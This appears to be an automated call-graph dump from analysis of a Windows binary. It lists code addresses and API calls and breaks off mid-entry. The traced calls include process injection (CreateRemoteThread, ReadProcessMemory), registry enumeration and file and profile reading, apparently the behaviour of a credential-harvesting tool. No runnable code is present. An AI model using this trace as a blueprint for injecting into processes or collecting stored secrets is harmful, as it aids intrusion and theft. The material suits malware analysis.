GetVersionExA 7156->7188 7161 404c11 ??2@YAPAXI ReadProcessMemory 7163 404c31 7161->7163 7164 404c42 ??3@YAXPAX 7161->7164 7162 404c49 7162->7152 7165 404c4e FreeLibrary 7162->7165 7210 404915 7163->7210 7164->7162 7165->7152 7169 404436 _mbscpy 7168->7169 7170 404429 GetSystemDirectoryA 7168->7170 7171 40680e 2 API calls 7169->7171 7170->7169 7172 404450 7171->7172 7173 4028e7 4 API calls 7172->7173 7174 404455 7173->7174 7175 406efe 3 API calls 7174->7175 7176 40448f 7175->7176 7218 411147 7176->7218 7181 4044cd 7181->7132 7181->7133 7182 4044ac memcpy 7182->7181 7184 411bb3 GetModuleHandleA GetProcAddress 7183->7184 7185 404a50 7183->7185 7184->7185 7186 411be4 GetModuleHandleA GetProcAddress strlen strlen 7184->7186 7185->7137 7185->7138 7186->7185 7187->7156 7189 41206a CreateRemoteThread 7188->7189 7190 411fec 7188->7190 7192 404bac 7189->7192 7308 411f43 7190->7308 7193 4044de 7192->7193 7194 410daa 2 API calls 7193->7194 7196 4044f8 7194->7196 7195 404565 7197 404574 ResumeThread WaitForSingleObject CloseHandle memset ReadProcessMemory 7195->7197 7198 40456b FreeLibrary 7195->7198 7196->7195 7199 410d8a LoadLibraryA 7196->7199 7197->7161 7197->7162 7198->7197 7200 404509 7199->7200 7201 40455a CloseHandle 7200->7201 7202 40450d GetProcAddress 7200->7202 7201->7195 7203 404522 7202->7203 7204 404559 7202->7204 7203->7204 7205 410d8a LoadLibraryA 7203->7205 7204->7201 7206 404537 7205->7206 7207 404550 CloseHandle 7206->7207 7208 40453b GetProcAddress 7206->7208 7207->7204 7208->7207 7209 404549 7208->7209 7209->7207 7211 406b3b GetVersionExA 7210->7211 7212 40491c 7211->7212 7213 404920 7212->7213 7214 404939 7212->7214 7216 404937 7213->7216 7312 404890 7213->7312 7214->7216 7217 404890 15 API calls 7214->7217 7216->7164 7217->7214 7240 406b2a 7218->7240 7221 411150 7243 4110af 7221->7243 7222 411157 7253 41102b 7222->7253 7225 404495 7226 411560 7225->7226 7227 41156d 7226->7227 7228 406b2a GetVersionExA 7227->7228 7229 411575 7228->7229 7231 41158b memset 7229->7231 7232 41161e 7229->7232 7230 4044a3 7230->7181 7230->7182 7234 4115bf 7231->7234 7232->7230 7235 411650 _mbscpy 7232->7235 7236 411696 CloseHandle 7232->7236 7234->7230 7261 4112d9 7234->7261 7271 411172 7234->7271 7287 41172b 7234->7287 7238 41172b 8 API calls 7235->7238 7236->7230 7238->7232 7241 406b06 GetVersionExA 7240->7241 7242 406b2f 7241->7242 7242->7221 7242->7222 7244 4110bc LoadLibraryA 7243->7244 7245 411145 7243->7245 7244->7245 7246 4110ce GetProcAddress 7244->7246 7245->7225 7247 41112a 7246->7247 7248 4110e6 GetProcAddress 7246->7248 7247->7245 7249 41113e FreeLibrary 7247->7249 7248->7247 7250 4110f7 GetProcAddress 7248->7250 7249->7245 7250->7247 7251 411108 GetProcAddress 7250->7251 7251->7247 7252 411119 GetProcAddress 7251->7252 7252->7247 7254 411034 GetModuleHandleA 7253->7254 7260 4110a2 7253->7260 7255 411046 GetProcAddress 7254->7255 7254->7260 7256 41105e GetProcAddress 7255->7256 7255->7260 7257 41106f GetProcAddress 7256->7257 7256->7260 7258 411080 GetProcAddress 7257->7258 7257->7260 7259 411091 GetProcAddress 7258->7259 7258->7260 7259->7260 7260->7225 7262 406b2a GetVersionExA 7261->7262 7263 4112ea 7262->7263 7264 41133e 7263->7264 7265 4112ee 7263->7265 7292 411255 7264->7292 7266 411347 7265->7266 7267 4112f6 OpenProcess 7265->7267 7266->7234 7267->7266 7270 41130b CloseHandle 7267->7270 7270->7266 7272 411184 strchr 7271->7272 7274 411181 _mbscpy 7271->7274 7272->7274 7275 4111a4 7272->7275 7276 411250 7274->7276 7277 407139 3 API calls 7275->7277 7276->7234 7278 4111b3 7277->7278 7279 4111ba memset 7278->7279 7280 4111fd 7278->7280 7297 406bc3 7279->7297 7282 411202 memset 7280->7282 7283 411247 _mbscpy 7280->7283 7285 406bc3 2 API calls 7282->7285 7283->7276 7284 4111e0 _mbscpy _mbscat 7284->7276 7286 411228 memcpy _mbscat 7285->7286 7286->7276 7300 4116a9 strchr 7287->7300 7290 411743 memcpy 7291 411764 7290->7291 7291->7234 7293 4112b7 7292->7293 7294 411268 7292->7294 7293->7266 7294->7293 7295 4112b0 CloseHandle 7294->7295 7296 4112bc _mbscpy CloseHandle 7294->7296 7295->7293 7296->7293 7298 406bd2 GetWindowsDirectoryA 7297->7298 7299 406be3 _mbscpy 7297->7299 7298->7299 7299->7284 7301 4116d2 strchr 7300->7301 7306 4116c0 7300->7306 7302 4116ec memset 7301->7302 7301->7306 7304 406a87 _mbscpy strrchr 7302->7304 7303 4116c4 _strcmpi 7305 4116cb 7303->7305 7307 411715 _strcmpi 7304->7307 7305->7290 7305->7291 7306->7303 7307->7305 7309 411f4e LoadLibraryA 7308->7309 7311 411fc1 7308->7311 7310 411f63 GetProcAddress 7309->7310 7309->7311 7310->7311 7311->7192 7313 406b3b GetVersionExA 7312->7313 7315 4048a2 7313->7315 7314 40490b 7314->7216 7315->7314 7317 404578 wcslen memset 7315->7317 7318 406b3b GetVersionExA 7317->7318 7324 4045c7 7318->7324 7319 404649 wcschr 7321 40465c wcsncmp 7319->7321 7319->7324 7320 406b3b GetVersionExA 7320->7324 7321->7324 7322 404c9d LoadLibraryA GetProcAddress FreeLibrary 7322->7324 7323 404824 memcpy 7323->7324 7324->7319 7324->7320 7324->7321 7324->7322 7324->7323 7325 404ce0 FreeLibrary 7324->7325 7326 40487f 7324->7326 7327 4046f1 memcpy wcschr 7324->7327 7328 4047d8 memcpy LocalFree 7324->7328 7325->7324 7326->7314 7329 404720 wcscpy 7327->7329 7330 404732 LocalFree 7327->7330 7328->7324 7329->7330 7330->7324 7332 4029f8 7331->7332 7332->6988 7333->6709 7334->6718 7335->6718 7337 4029d9 strlen 7336->7337 7338 4024a4 7337->7338 7339 4024b7 ??2@YAPAXI ??2@YAPAXI memcpy 7338->7339 7340 4024ac 7338->7340 7341 4025c8 7339->7341 7340->6726 7340->6727 7342 4025ea ??3@YAXPAX ??3@YAXPAX 7341->7342 7342->7340 7343->6733 7344->6739 7345->6739 7347 411d82 RegQueryValueExA 7346->7347 7348 40275e 7347->7348 7349 40282d RegCloseKey 7348->7349 7350 40276a strtoul 7348->7350 7349->6739 7350->7350 7351 402794 7350->7351 7352 4027ee _mbscpy _mbscpy 7351->7352 7352->7349 7353->6739 7365 411d68 RegOpenKeyExA 7354->7365 7356 413772 7357 40da13 7356->7357 7358 411d82 RegQueryValueExA 7356->7358 7357->6746 7357->6749 7359 41378b 7358->7359 7360 4137bc RegCloseKey 7359->7360 7361 411d82 RegQueryValueExA 7359->7361 7360->7357 7362 4137a6 7361->7362 7362->7360 7366 413a5a 7362->7366 7365->7356 7378 413646 strlen 7366->7378 7368 413a73 7369 413a92 7368->7369 7380 4137ce 7368->7380 7373 4137ba 7369->7373 7409 413b1d memset memset memset 7369->7409 7372 413aab 7372->7373 7374 413acb memset 7372->7374 7373->7360 7375 4137ce 21 API calls 7374->7375 7376 413afc 7375->7376 7376->7373 7377 413b05 _mbscpy 7376->7377 7377->7373 7379 413665 7378->7379 7379->7368 7381 414060 7380->7381 7382 4137db memset 7381->7382 7383 413646 strlen 7382->7383 7384 413809 strlen 7383->7384 7385 413a51 7384->7385 7386 413822 7384->7386 7385->7369 7386->7385 7387 41382a memset memset memset memset 7386->7387 7388 4138a4 7387->7388 7424 40c929 7388->7424 7390 4138b2 7431 40c9c7 7390->7431 7392 4138c1 memcpy 7393 4138dd 7392->7393 7394 40c929 3 API calls 7393->7394 7395 4138ee 7394->7395 7396 40c9c7 5 API calls 7395->7396 7397 4138fa memcpy memcpy 7396->7397 7398 413928 7397->7398 7399 40c929 3 API calls 7398->7399 7400 413939 7399->7400 7401 40c9c7 5 API calls 7400->7401 7403 413945 7401->7403 7402 4139e2 _mbscpy 7404 413a00 7402->7404 7403->7402 7403->7403 7405 40c929 3 API calls 7404->7405 7406 413a0e 7405->7406 7407 40c9c7 5 API calls 7406->7407 7408 413a1a memcpy memcpy 7407->7408 7408->7385 7410 413646 strlen 7409->7410 7411 413b81 strlen 7410->7411 7412 413b99 7411->7412 7423 413c28 7411->7423 7413 413ba1 memcpy memcpy 7412->7413 7412->7423 7414 413bcf 7413->7414 7415 40c929 3 API calls 7414->7415 7416 413be1 7415->7416 7417 40c9c7 5 API calls 7416->7417 7418 413bf0 memcpy 7417->7418 7419 413c0e 7418->7419 7420 40c929 3 API calls 7419->7420 7421 413c1f 7420->7421 7422 40c9c7 5 API calls 7421->7422 7422->7423 7423->7372 7425 40c940 7424->7425 7426 40c960 memcpy 7425->7426 7427 40c967 memcpy 7425->7427 7430 40c97e 7425->7430 7426->7390 7427->7430 7428 40c98d memcpy 7428->7430 7430->7426 7430->7428 7432 40c9e1 memset 7431->7432 7433 40ca07 memset 7431->7433 7438 40ca46 7432->7438 7435 40ca16 7433->7435 7437 40ca2c memcpy memset 7435->7437 7436 40c9f7 memset 7436->7435 7437->7392 7438->7436 7454 411d68 RegOpenKeyExA 7439->7454 7441 40d7b8 7442 40d7c3 memset 7441->7442 7443 40d92b 7441->7443 7445 40d7f1 7442->7445 7443->6753 7443->6754 7446 40d922 RegCloseKey 7445->7446 7448 40d80f RegQueryValueExA 7445->7448 7449 40d8f9 RegCloseKey 7445->7449 7451 40d85a memset 7445->7451 7453 40d88b _mbscpy _mbscpy 7445->7453 7455 411d68 RegOpenKeyExA 7445->7455 7467 411dee RegEnumKeyExA 7445->7467 7446->7443 7448->7449 7450 40d839 atoi 7448->7450 7449->7445 7450->7445 7450->7449 7456 40807d memcpy memcpy 7451->7456 7453->7445 7454->7441 7455->7445 7457 4080b0 7456->7457 7458 40c929 3 API calls 7457->7458 7459 4080bf 7458->7459 7460 40c9c7 5 API calls 7459->7460 7461 4080cb 7460->7461 7461->7461 7462 40810c memset 7461->7462 7465 408194 7461->7465 7464 408138 7462->7464 7463 40815f strlen 7463->7465 7466 40816b _mbscpy _mbscpy 7463->7466 7464->7463 7465->7445 7466->7465 7467->7445 7469 407dc4 7468->7469 7470 411d68 RegOpenKeyExA 7469->7470 7470->6760 7471->6766 7472->6766 7475 407e51 7473->7475 7474 407f77 RegCloseKey 7474->6766 7475->7474 7476 407e65 memset 7475->7476 7477 407e96 7476->7477 7478 404c9d 3 API calls 7477->7478 7481 407ede 7478->7481 7479 407f6f 7480 404ce0 FreeLibrary 7479->7480 7480->7474 7481->7479 7482 407f25 memcpy 7481->7482 7483 406958 2 API calls 7482->7483 7484 407f59 LocalFree 7483->7484 7484->7479 7486->6766 7487->6775 7488->6781 7489->6781 7491 407b01 7490->7491 7492 407bbf RegCloseKey 7490->7492 7493 404c9d 3 API calls 7491->7493 7492->6781 7495 407b12 7493->7495 7494 404ce0 FreeLibrary 7494->7492 7496 407b3e WideCharToMultiByte LocalFree 7495->7496 7502 407baa 7495->7502 7497 411d82 RegQueryValueExA 7496->7497 7498 407b87 7497->7498 7499 411d82 RegQueryValueExA 7498->7499 7500 407b9c 7499->7500 7501 406958 2 API calls 7500->7501 7501->7502 7502->7494 7503->6781 7504->6792 7522 4067ba CreateFileA 7505->7522 7507 410ad6 7508 410ae3 GetFileSize 7507->7508 7509 410b8e 7507->7509 7523 407a56 7508->7523 7509->6793 7511 410b07 7512 407a56 2 API calls 7511->7512 7513 410b1a 7512->7513 7514 406ed6 ReadFile 7513->7514 7515 410b31 7514->7515 7516 410b75 CloseHandle 7515->7516 7518 410b50 WideCharToMultiByte 7515->7518 7545 407a41 7516->7545 7526 4108fa 7518->7526 7520 407a41 ??3@YAXPAX 7520->7509 7522->7507 7524 407a6a ??2@YAPAXI 7523->7524 7525 407a5c ??3@YAXPAX 7523->7525 7524->7511 7525->7524 7527 410907 7526->7527 7528 404c9d 3 API calls 7527->7528 7529 41091d 7528->7529 7530 410925 memset 7529->7530 7531 410ab6 7529->7531 7548 407193 7530->7548 7532 404ce0 FreeLibrary 7531->7532 7534 410abe 7532->7534 7534->7516 7535 410958 7535->7531 7536 41096b memset 7535->7536 7537 407193 memcpy 7535->7537 7539 4109b8 MultiByteToWideChar 7535->7539 7540 4109e0 memset 7535->7540 7542 40720f 2 API calls 7535->7542 7543 410a51 LocalFree 7535->7543 7544 410a2f memcpy 7535->7544 7552 40720f 7536->7552 7537->7535 7539->7535 7541 4029d9 strlen 7540->7541 7541->7535 7542->7535 7543->7535 7544->7543 7546 407a55 7545->7546 7547 407a47 ??3@YAXPAX 7545->7547 7546->7520 7547->7546 7549 4071aa 7548->7549 7551 4071a6 7548->7551 7550 4071d4 memcpy 7549->7550 7549->7551 7550->7551 7551->7535 7553 407221 7552->7553 7556 407228 7552->7556 7553->7535 7554 407236 strchr 7554->7556 7555 407269 memcpy 7555->7556 7556->7553 7556->7554 7556->7555 7557->6798 7558->6807 7559->6807 7561 410eb7 7560->7561 7561->6807 7562->6807 7563->6817 7578 4067ba CreateFileA 7564->7578 7566 405af9 7567 405b02 GetFileSize 7566->7567 7568 405b53 7566->7568 7569 405b12 7567->7569 7570 405b4a CloseHandle 7567->7570 7568->6819 7571 407a56 2 API calls 7569->7571 7570->7568 7572 405b23 7571->7572 7573 406ed6 ReadFile 7572->7573 7574 405b32 7573->7574 7579 405865 memset 7574->7579 7577 407a41 ??3@YAXPAX 7577->7570 7578->7566 7580 407193 memcpy 7579->7580 7588 4058c3 7580->7588 7581 405ae1 7581->7577 7582 406958 2 API calls 7582->7588 7583 405902 strlen 7583->7588 7584 40593d memset memset 7584->7588 7585 4070e4 strlen strlen memcmp 7585->7588 7586 407193 memcpy 7586->7588 7588->7581 7588->7582 7588->7583 7588->7584 7588->7585 7588->7586 7589 406d5a strtoul 7588->7589 7589->7588 7591 40f9b6 7590->7591 7641 40fa34 7591->7641 7594 40fa27 7654 40733e free free 7594->7654 7596 40e6a8 strrchr 7596->6824 7599 40f9d1 7600 40fa11 7599->7600 7655 406d2b 7599->7655 7600->7594 7601 406958 2 API calls 7600->7601 7602 40fa26 7601->7602 7602->7594 7686 410c4c memset 7603->7686 7606 406521 memset 7608 406958 2 API calls 7606->7608 7607 4066d9 7638 410d6f 7607->7638 7609 40654d 7608->7609 7610 40656e memset memset memset strlen strlen 7609->7610 7635 4066c1 7609->7635 7611 4065d5 7610->7611 7612 4065e4 strlen strlen 7610->7612 7614 406b4b 4 API calls 7611->7614 7616 40661d strlen strlen 7612->7616 7617 40660e 7612->7617 7613 410d6f 2 API calls 7613->7607 7614->7612 7620 406647 7616->7620 7621 406656 7616->7621 7618 406b4b 4 API calls 7617->7618 7618->7616 7622 406b4b 4 API calls 7620->7622 7696 4069d3 GetFileAttributesA 7621->7696 7622->7621 7624 40666d 7625 406681 7624->7625 7626 406672 7624->7626 7716 4069d3 GetFileAttributesA 7625->7716 7697 4062db 7626->7697 7629 40668d 7630 4066a1 7629->7630 7631 406692 7629->7631 7717 4069d3 GetFileAttributesA 7630->7717 7632 4062db 21 API calls 7631->7632 7632->7630 7634 4066ad 7634->7635 7636 4066b2 7634->7636 7635->7613 7637 4062db 21 API calls 7636->7637 7637->7635 7639 410d74 SetCurrentDirectoryA FreeLibrary 7638->7639 7640 40e71c 7638->7640 7639->7640 7640->6829 7642 40fa48 7641->7642 7660 40fc4f memset memset 7642->7660 7644 40fa4e 7645 40fb5b 7644->7645 7647 40fa66 memset 7644->7647 7649 40fa8a strlen strlen 7644->7649 7650 406b4b strlen _mbscat _mbscpy _mbscat 7644->7650 7651 40faec strlen strlen 7644->7651 7652 4069d3 GetFileAttributesA 7644->7652 7653 407364 7 API calls 7644->7653 7673 40733e free free 7645->7673 7647->7644 7648 40f9bc 7648->7594 7648->7599 7649->7644 7650->7644 7651->7644 7652->7644 7653->7644 7654->7596 7685 4067ba CreateFileA 7655->7685 7657 406d38 7658 406d55 CompareFileTime 7657->7658 7659 406d3f GetFileTime CloseHandle 7657->7659 7658->7599 7659->7658 7661 41223f 10 API calls 7660->7661 7662 40fc9e 7661->7662 7663 40680e 2 API calls 7662->7663 7664 40fca5 _mbscat 7663->7664 7665 41223f 10 API calls 7664->7665 7666 40fcc6 7665->7666 7667 40680e 2 API calls 7666->7667 7668 40fccd _mbscat 7667->7668 7674 40fb6a 7668->7674 7671 40fb6a 22 API calls 7672 40fcfa 7671->7672 7672->7644 7673->7648 7675 40783b 9 API calls 7674->7675 7684 40fb9e 7675->7684 7676 40fc3e 7677 407930 FindClose 7676->7677 7678 40fc49 7677->7678 7678->7671 7679 407364 7 API calls 7679->7684 7680 40783b 9 API calls 7680->7684 7681 407898 9 API calls 7681->7684 7682 407800 strcmp strcmp 7682->7684 7683 407930 FindClose 7683->7684 7684->7676 7684->7679 7684->7680 7684->7681 7684->7682 7684->7683 7685->7657 7718 405ec5 memset memset 7686->7718 7689 406519 7689->7606 7689->7607 7690 410c8d GetCurrentDirectoryA SetCurrentDirectoryA memset strlen strlen 7691 410cf3 LoadLibraryExA 7690->7691 7692 410cdc 7690->7692 7691->7689 7695 410d17 6 API calls 7691->7695 7693 406b4b 4 API calls 7692->7693 7693->7691 7695->7689 7696->7624 7698 4062e8 7697->7698 7750 4067ba CreateFileA 7698->7750 7700 4062f3 7701 406302 GetFileSize 7700->7701 7702 4064f4 7700->7702 7703 406316 ??2@YAPAXI 7701->7703 7704 4064eb CloseHandle 7701->7704 7702->7625 7705 406ed6 ReadFile 7703->7705 7704->7702 7706 40632c memset memset memset 7705->7706 7751 4060c4 7706->7751 7708 4064e2 ??3@YAXPAX 7708->7704 7709 4063ad strcmp 7711 406395 7709->7711 7710 4060c4 memcpy 7710->7711 7711->7708 7711->7709 7711->7710 7712 40644e _mbscpy 7711->7712 7713 40645d _mbscpy 7711->7713 7715 4064a7 strcmp 7711->7715 7712->7711 7755 40623f 7713->7755 7715->7711 7716->7629 7717->7634 7740 411d68 RegOpenKeyExA 7718->7740 7720 405f1c 7721 406072 _mbscpy 7720->7721 7722 405f27 memset 7720->7722 7724 406085 ExpandEnvironmentStringsA 7721->7724 7725 4060b0 7721->7725 7741 411dee RegEnumKeyExA 7722->7741 7726 405e4a 8 API calls 7724->7726 7725->7689 7725->7690 7727 406098 7726->7727 7727->7725 7731 4060a2 GetCurrentDirectoryA 7727->7731 7728 406069 RegCloseKey 7728->7721 7729 405f5a _mbsnbicmp 7730 405f78 memset memset _snprintf 7729->7730 7736 405f52 7729->7736 7734 411dae 3 API calls 7730->7734 7732 405e4a 8 API calls 7731->7732 7732->7725 7735 405fd9 _mbsrchr 7734->7735 7735->7736 7736->7728 7736->7729 7738 406004 _mbsicmp 7736->7738 7742 405e4a memset strlen strlen 7736->7742 7748 411dee RegEnumKeyExA 7736->7748 7738->7736 7739 40601d _mbscpy _mbscpy 7738->7739 7739->7736 7740->7720 7741->7736 7743 405e91 7742->7743 7744 405ea0 7742->7744 7745 406b4b 4 API calls 7743->7745 7749 4069d3 GetFileAttributesA 7744->7749 7745->7744 7747 405eb7 7747->7736 7748->7736 7749->7747 7750->7700 7752 4060db 7751->7752 7754 4060d7 7751->7754 7753 406106 memcpy 7752->7753 7752->7754 7753->7754 7754->7711 7756 40624c 7755->7756 7757 406259 _mbscpy 7756->7757 7763 406143 7757->7763 7760 406143 3 API calls 7761 406290 _mbscpy _mbscpy _mbscpy 7760->7761 7762 4062d6 7761->7762 7762->7711 7764 406163 7763->7764 7765 406174 7763->7765 7766 406180 memset 7764->7766 7767 40616c 7764->7767 7765->7760 7769 4029d9 strlen 7766->7769 7768 4029d9 strlen 7767->7768 7768->7765 7770 4061a7 7769->7770 7770->7765 7771 406214 memcpy 7770->7771 7771->7765 7773 4085c6 7772->7773 7801 40733e free free 7773->7801 7775 408602 7802 40821a 7775->7802 7777 4085d3 7777->7775 7825 407407 7777->7825 7781 4086db 7789 40733e free free 7781->7789 7782 4086d3 7783 404d18 7 API calls 7782->7783 7783->7781 7784 408649 MultiByteToWideChar _wcslwr 7830 408490 7784->7830 7787 408610 7787->7781 7787->7782 7787->7784 7788 408490 17 API calls 7787->7788 7788->7787 7789->6836 7791 4081b7 7790->7791 7792 4081ac FreeLibrary 7790->7792 7793 407491 free 7791->7793 7792->7791 7794 4081c0 7793->7794 7868 40733e free free 7794->7868 7796 4081c8 7869 40733e free free 7796->7869 7798 4081d0 7870 40733e free free 7798->7870 7800 4081d8 7801->7777 7844 40733e free free 7802->7844 7804 408233 7845 411d68 RegOpenKeyExA 7804->7845 7806 408246 7807 408251 7806->7807 7808 408356 7806->7808 7809 40746b 4 API calls 7807->7809 7822 404d18 7808->7822 7810 408269 memset 7809->7810 7846 4074aa 7810->7846 7813 40834c RegCloseKey 7813->7808 7814 4082bd 7815 4082c6 _strupr 7814->7815 7816 407364 7 API calls 7815->7816 7817 4082e4 7816->7817 7818 407364 7 API calls 7817->7818 7819 4082f8 memset 7818->7819 7820 4074aa 7819->7820 7821 408327 RegEnumValueA 7820->7821 7821->7813 7821->7815 7823 404d79 7822->7823 7824 404d1d 7 API calls 7822->7824 7823->7787 7824->7823 7848 407428 7825->7848 7828 407424 7828->7777 7829 407364 7 API calls 7829->7828 7831 404d18 7 API calls 7830->7831 7832 4084a6 7831->7832 7833 4085a8 wcslen 7832->7833 7834 4084cb wcslen 7832->7834 7833->7787 7835 404d18 7 API calls 7834->7835 7837 4084e4 7835->7837 7836 40859e 7839 404d18 7 API calls 7836->7839 7837->7836 7838 404d18 7 API calls 7837->7838 7840 40851d 7838->7840 7839->7833 7840->7836 7841 40853a memset 7840->7841 7842 408560 7841->7842 7852 4083d0 7842->7852 7844->7804 7845->7806 7847 4074b0 RegEnumValueA 7846->7847 7847->7813 7847->7814 7849 40742e 7848->7849 7850 407437 strcmp 7849->7850 7851 407413 7849->7851 7850->7849 7850->7851 7851->7828 7851->7829 7853 407428 strcmp 7852->7853 7854 4083e3 7853->7854 7855 40848a 7854->7855 7856 40841f wcslen 7854->7856 7855->7836 7857 404c9d 3 API calls 7856->7857 7860 408447 7857->7860 7858 408482 7859 404ce0 FreeLibrary 7858->7859 7859->7855 7860->7858 7861 408479 LocalFree 7860->7861 7863 40835f 7860->7863 7861->7858 7864 4083c9 7863->7864 7867 408377 7863->7867 7864->7861 7865 408382 wcslen 7865->7864 7866 40839b wcslen 7865->7866 7866->7867 7867->7864 7867->7865 7868->7796 7869->7798 7870->7800 7872 40e506 7871->7872 7873 40e515 7871->7873 7874 406b4b 4 API calls 7872->7874 7879 4069d3 GetFileAttributesA 7873->7879 7874->7873 7876 40e52c 7877 40e540 7876->7877 7880 40e293 7876->7880 7877->6841 7877->6843 7879->7876 7895 4067ba CreateFileA 7880->7895 7882 40e2a7 7883 40e2b4 GetFileSize 7882->7883 7884 40e4ac 7882->7884 7885 40e4a3 CloseHandle 7883->7885 7886 40e2cc ??2@YAPAXI memset ReadFile 7883->7886 7884->7877 7885->7884 7893 40e314 7886->7893 7887 407193 memcpy 7887->7893 7888 40e49c ??3@YAXPAX 7888->7885 7889 407139 strlen strlen _memicmp 7889->7893 7890 40e39b memcpy memcpy 7891 407139 3 API calls 7890->7891 7891->7893 7892 406958 2 API calls 7892->7893 7893->7887 7893->7888 7893->7889 7893->7890 7893->7892 7894 4029d9 strlen 7893->7894 7894->7893 7895->7882 7897 414060 7896->7897 7898 40dd72 memset strlen strlen 7897->7898 7899 40ddbe 7898->7899 7900 40ddad 7898->7900 7910 4069d3 GetFileAttributesA 7899->7910 7901 406b4b 4 API calls 7900->7901 7901->7899 7903 40ddd4 7904 40dddd 7 API calls 7903->7904 7905 40dfcf 7903->7905 7904->7905 7908 40dea4 7904->7908 7905->6851 7907 406958 strlen memcpy 7907->7908 7908->7905 7908->7907 7909 40df4c sprintf GetPrivateProfileStringA GetPrivateProfileStringA 7908->7909 7911 40dcf2 7908->7911 7909->7905 7909->7908 7910->7903 7912 40dd0d 7911->7912 7913 40dd54 7912->7913 7914 40dd1f strtoul 7912->7914 7913->7908 7914->7912 7914->7913 7915->6882 7975 406d91 memset 7916->7975 7918 412d78 ??2@YAPAXI 7919 412d87 7918->7919 7920 412d90 ??2@YAPAXI 7919->7920 7921 412da2 7920->7921 7922 412dab ??2@YAPAXI 7921->7922 7923 412dc2 ??2@YAPAXI 7922->7923 7925 412de6 ??2@YAPAXI 7923->7925 7927 40ebd8 7925->7927 7928 412f02 7927->7928 7976 4067ba CreateFileA 7928->7976 7930 412f0f 7931 412f44 7930->7931 7932 412f17 GetFileSize 7930->7932 7931->6886 7977 412ed6 7932->7977 7934 412f28 7935 406ed6 ReadFile 7934->7935 7936 412f34 CloseHandle 7935->7936 7936->7931 7980 4075ad MultiByteToWideChar 7937->7980 7940 412fa1 7942 407491 free 7940->7942 7941 412ed6 2 API calls 7943 412f85 memcpy 7941->7943 7944 40ec08 7942->7944 7943->7940 7946 40d1a5 7944->7946 7947 413095 7946->7947 7995 40733e free free 7947->7995 7949 4130c7 7996 40733e free free 7949->7996 7951 4133aa 7951->6887 7952 40746b 4 API calls 7954 4130d2 7952->7954 7953 412fb0 19 API calls 7953->7954 7954->7951 7954->7952 7954->7953 7955 41322b memcpy 7954->7955 7997 412768 7954->7997 7955->7954 7958 412e65 7957->7958 7959 412e5a ??3@YAXPAX 7957->7959 7960 412e7c 7958->7960 7961 407491 free 7958->7961 7959->7958 7962 407491 free 7960->7962 7964 412e92 7960->7964 7965 412e75 ??3@YAXPAX 7961->7965 7966 412e8b ??3@YAXPAX 7962->7966 7963 412ea8 7968 412ebe 7963->7968 8006 40733e free free 7963->8006 7964->7963 7967 407491 free 7964->7967 7965->7960 7966->7964 7969 412ea1 ??3@YAXPAX 7967->7969 7971 412ed4 7968->7971 8007 40733e free free 7968->8007 7969->7963 7971->6876 7972 412eb7 ??3@YAXPAX 7972->7968 7974 412ecd ??3@YAXPAX 7974->7971 7975->7918 7976->7930 7978 412ee0 ??3@YAXPAX 7977->7978 7979 412eeb ??2@YAPAXI 7977->7979 7978->7979 7979->7934 7981 407634 7980->7981 7982 4075d7 7980->7982 7981->7940 7981->7941 7983 40746b 4 API calls 7982->7983 7984 4075f5 MultiByteToWideChar 7983->7984 7986 407614 7984->7986 7987 40762a 7984->7987 7990 407564 WideCharToMultiByte 7986->7990 7988 407491 free 7987->7988 7988->7981 7991 4075a4 7990->7991 7992 407586 7990->7992 7991->7987 7993 40746b 4 API calls 7992->7993 7994 407590 WideCharToMultiByte 7993->7994 7994->7991 7995->7949 7996->7954 7998 412d44 7997->7998 8001 412b5d 7997->8001 7998->7954 7999 412b83 strlen strncmp 7999->8001 8000 412cc0 strlen strncmp 8000->8001 8001->7998 8001->7999 8001->8000 8002 412c93 memcpy 8001->8002 8003 412c0b memcpy atoi WideCharToMultiByte 8001->8003 8005 406d5a strtoul 8002->8005 8003->8001 8005->8001 8006->7972 8007->7974 8008->6899 8009->6919 8020 40f94e 8010->8020 8013 40f946 8013->6919 8014 40f8c8 memcmp 8014->8013 8015 40f8df 8014->8015 8015->8013 8016 40f94e 3 API calls 8015->8016 8019 40f8f5 8016->8019 8017 40f94e 3 API calls 8017->8019 8019->8013 8019->8017 8025 40f689 8019->8025 8021 40f960 SetFilePointer 8020->8021 8022 40f96e memset 8020->8022 8021->8022 8023 406ed6 ReadFile 8022->8023 8024 40f8c4 8023->8024 8024->8013 8024->8014 8026 40f696 8025->8026 8027 40f806 8026->8027 8028 40f94e 3 API calls 8026->8028 8027->8019 8029 40f6ca 8028->8029 8029->8027 8030 40f94e 3 API calls 8029->8030 8031 40f6e7 8030->8031 8032 40f94e 3 API calls 8031->8032 8035 40f779 8031->8035 8034 40f710 _strcmpi 8032->8034 8034->8035 8036 40f734 _strcmpi 8034->8036 8035->8027 8037 40f789 _strcmpi 8035->8037 8055 40f5c1 8035->8055 8036->8035 8038 40f74b _strcmpi 8036->8038 8040 40f80b 8037->8040 8041 40f79d _strcmpi 8037->8041 8038->8035 8039 40f762 _strcmpi 8038->8039 8039->8035 8042 40f5c1 2 API calls 8040->8042 8041->8040 8043 40f7b1 _strcmpi 8041->8043 8045 40f822 8042->8045 8043->8040 8044 40f7c5 _strcmpi 8043->8044 8044->8040 8046 40f7d9 _strcmpi 8044->8046 8045->8027 8047 40f826 _mbscpy 8045->8047 8046->8035 8046->8040 8048 40f84e 8047->8048 8048->8027 8049 40f5c1 2 API calls 8048->8049 8050 40f83a _strcmpi 8048->8050 8049->8048 8050->8048 8051 40f869 8050->8051 8052 40f5c1 2 API calls 8051->8052 8053 40f87f 8052->8053 8053->8027 8054 40f883 _mbscpy 8053->8054 8054->8027 8056 40f649 8055->8056 8057 40f5d8 8055->8057 8056->8035 8057->8056 8058 40f61e memcpy 8057->8058 8058->8056 8059 40f65a 8058->8059 8059->8056 8060 40f666 _ultoa 8059->8060 8060->8056 8061 41208b FindResourceA 8062 4120a4 SizeofResource 8061->8062 8065 4120ce 8061->8065 8063 4120b5 LoadResource 8062->8063 8062->8065 8064 4120c3 LockResource 8063->8064 8063->8065 8064->8065 5991 412111 EnumResourceNamesA 6020 413e10 6039 414000 6020->6039 6022 413e1c GetModuleHandleA 6023 413e2e __set_app_type __p__fmode __p__commode 6022->6023 6025 413ec0 6023->6025 6026 413ed4 6025->6026 6027 413ec8 __setusermatherr 6025->6027 6040 413fe8 _controlfp 6026->6040 6027->6026 6029 413ed9 _initterm __getmainargs _initterm 6030 413f30 GetStartupInfoA 6029->6030 6032 413f64 GetModuleHandleA 6030->6032 6041 40c66a 6032->6041 6036 413f95 _cexit 6038 413fca 6036->6038 6037 413f8e exit 6037->6036 6039->6022 6040->6029 6094 404d7a LoadLibraryA 6041->6094 6043 40c682 6044 40c686 6043->6044 6102 